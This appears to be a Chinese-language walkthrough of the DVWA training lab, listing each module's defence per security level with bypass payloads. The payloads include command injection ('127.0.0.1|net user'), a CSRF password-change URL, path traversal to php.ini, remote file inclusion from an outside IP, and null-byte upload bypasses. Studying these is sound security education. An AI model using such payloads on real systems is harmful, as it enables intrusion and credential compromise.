大伙直接看MD吧,payload有的被過濾了
反射型XSS
Low
防御:無
Payload:
Medium
防御:黑名單
Payload:
雙寫繞過
<sc
大小寫混淆繞過
High
防御:黑名單,正則
Payload:
黑名單繞過
Impossible
防御:HTML 實體
Payload:無
存儲型XSS
同反射型XSS
SQL Injection
Low
防御:無
Payload:
聯合查詢
Medium
防御:轉義
Payload:
是數字型,所以同上
High
防御:轉義 + LIMIT 1
Payload:
是數字型,所以同上,用#注釋LIMIT 1
Impossible
防御:PDO
Payload:
無
SQL Injection(Blind)
思想和SQL Injection一樣
Brute Force
Low
防御:無
Payload:
1.burp 爆破
2.sql注入
Medium
防御:防止了sql注入
Payload:
burp 爆破
High
防御:Token
Payload:
python腳本
or
burp https://blog.csdn.net/Z_Grant/article/details/100177201
Impossible
防御:錯誤次數限制 ,PDO
Payload:無
Command Injection
Low
防御:無
Payload:
127.0.0.1&&net user
Medium
防御:ban ”&&” 、”;”
Payload:
127.0.0.1&net user
High
防御:進一步完善了黑名單
Payload:
127.0.0.1|net user
Impossible
防御:is_numeric(string)
檢測string是否為數字或數字字符串,如果是返回TRUE,否則返回FALSE。
Payload:無
CSRF
Low
防御:無
Payload:
dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#
Medium
防御:REFERER頭
Payload:
burp改
High
防御:token
Payload:
XSS + CSRF
Impossible
防御:要求用戶輸入原始密碼(狠)
Payload:
無
Insecure CAPTCHA
Low
防御:無
Payload:
更改step參數
Medium
防御:passed_captcha參數檢查
Payload:
更改step參數,增加passed_captcha參數
High
防御:驗證$resp
Payload:
更改參數recaptcha_response_field以及http包頭的User-Agent
Impossible
防御:增加了Anti-CSRF token 驗證碼無法繞過 要求用戶輸入之前的密碼
Payload:無
File Upload
Low
防御:無
Payload:
懂得都懂
Medium
防御:上傳文件的類型、大小做了限制
Payload:
抓包修改文件類型
or
00階段
High
防御:白名單
Payload:
%00截斷
Impossible
防御:對上傳文件進行了重命名(為md5值,導致%00截斷無法繞過過濾規則)
Payload:
無
File Inclusion
Low
防御:無
Payload:
\dvwa\php.ini
Medium
防御:增加了str_replace函數,對page參數進行了一定的處理,將”http:// ”、”https://”、 ” ../”、”..\”替換為空字符,即刪除
Payload:
/dvwa/vulnerabilities/fi/page=..././..././..././..././..././..././..././..././..././..././xampp/htdocs/dvwa/php.ini
dvwa/vulnerabilities/fi/page=htthttp://p://192.168.5.12/phpinfo.txt(遠程文件包含)
High
防御:規定只能包含file開頭的文件
Payload:
dvwa/vulnerabilities/fi/page=file:///C:/xampp/htdocs/dvwa/php.ini
Impossible
防御:白名單機制
Payload:無